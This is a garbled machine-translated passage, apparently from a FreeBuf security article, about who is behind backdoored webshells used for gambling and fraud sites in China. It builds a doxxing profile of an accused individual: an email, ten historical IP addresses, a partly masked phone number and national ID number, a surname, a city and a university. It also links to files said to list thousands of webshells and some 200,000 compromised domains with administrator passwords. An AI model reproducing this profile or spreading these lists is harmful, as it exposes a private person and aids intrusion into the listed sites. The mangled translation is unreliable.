The great God in the circle: toby57, who has dealt with him before, said that he is working for the country, which is not quite like the mastermind of this matter, but the owner of the dedebox.com domain name is him, and he has enough ability to do such things
Email: [email protected] is also his most commonly used im
History IP
171.212.206.46 (Chengdu Telecom, Sichuan Province)
220.166.52.45 (Mianyang Telecom, Sichuan Province)
222.209.139.66 (Chengdu Telecom, Sichuan Province)
220.166.52.45 (Mianyang Telecom, Sichuan Province)
125.66.99.211 (Nanchong Telecom, Sichuan Province)
61.157.97.82 (Southwest University of science and technology, Mianyang City, Sichuan Province)
112.192.70.251 (Sichuan Nanchong Unicom)
125.65.97.134 (Mianyang Telecom, Sichuan Province)
61.157.97.85 (Southwest University of science and technology, Mianyang City, Sichuan Province)
182.139.60.17 (Chengdu Telecom, Sichuan Province)
Mobile number: 152083414xx
Name: Yang XX
ID card No.: 5116211989050625xx (Yuechi County, Sichuan Province)
City: Leshan
Studied in: Southwest University of science and technology, Mianyang City, Sichuan Province
conclusion
At present, there is no conclusion. It's still a mystery where all Damascus and all kinds of CMS backstage back doors in China leaked out, because the ability is too good... But I believe that the mystery can be solved by the police. You have enough rights and missions to complete the attack. Otherwise, the harm to the Internet users is too great. Those webshell are used to do gambling and fraud, which is a great harm. Almost a spinach industry and a fraud industry's black hat SEO source come from here. If the harm is not stopped in time, it will expand infinitely.
In addition, if you want to see the intruded site, please go to 360 search, the entertainment center to see the latest day
https://www.so.com/s?q=%E5%A8%B1%E4%B9%90%E5%9C%BA&src=srp&fr=360sou_newhome&adv_t=d
Warm tip: after using any Damascus hat, please check your shell to see if the file time is the latest creation time
PS: the attachment is a partial list of webshell, about thousands of random copies.
Portal: https://1drv.ms/u/s! Ahmf1buik7uanjrbtwlwoyebhu
List of some injured domain names (the base number is to repeat more than 1W, not to repeat about 200000. The amount of information is similar to the attachment. A station will record all the administrator login account passwords, including the existence of webshell)
Portal: https://1drv.ms/t/s! Ahmf1buik7ua72fwzxzuvmx3fw
You can search the webshell domain name in your hand when you get the list of victims. If it exists, you should deal with it in time to avoid being harmed by the lawbreakers.
*Original author: for the sake of author's safety, it has been handled anonymously. Please indicate that the reprint is from freebuf (freebuf. Com)